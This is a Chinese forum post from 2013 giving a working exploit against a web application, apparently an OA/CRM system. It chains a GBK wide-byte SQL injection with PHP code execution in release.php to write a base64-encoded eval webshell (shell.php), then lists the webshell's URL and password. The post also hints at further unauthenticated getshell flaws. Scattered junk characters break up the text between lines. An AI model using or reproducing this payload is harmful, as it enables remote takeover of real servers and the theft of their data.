此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
% l% }1 Q b% y2 ]: O! S) j
0 |' Y' N7 x, i/ P4 K: G* p
6 ]+ d. Q, X, s5 w6 XEXP:; ?& N, h1 n" c; O( K! p
' n# a! } V* r3 i# z
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
4 B2 N8 n- V2 C2 L9 F 3 I& P* @; J0 |0 z2 r* V2 w
第二步: [GET]http://site/general/email/index.php
5 H) J' u+ K, W' C" H! v4 _ & `3 G+ n3 @8 D0 ?0 U4 B
SHELL: http://site/general/email/shell.php 密码C3 w' ?1 ^8 D1 }& G! ~$ n% M i5 m# Z
+ G8 k6 ^) k q 5 Y! T2 e- S8 T, C- M. P% v5 Z, j
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
2 W( s7 ^4 ^$ a/ N % Q( p& [* D# t8 I( l- ~4 R' s: Q
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
+ G- g! t( I& u7 ^
' s }% _" e. M5 k; e1 }
. n3 @8 C5 n$ q6 P4 P$ t& ^5 d |
发表于 2013-2-4 16:19:29
收藏
支持
反对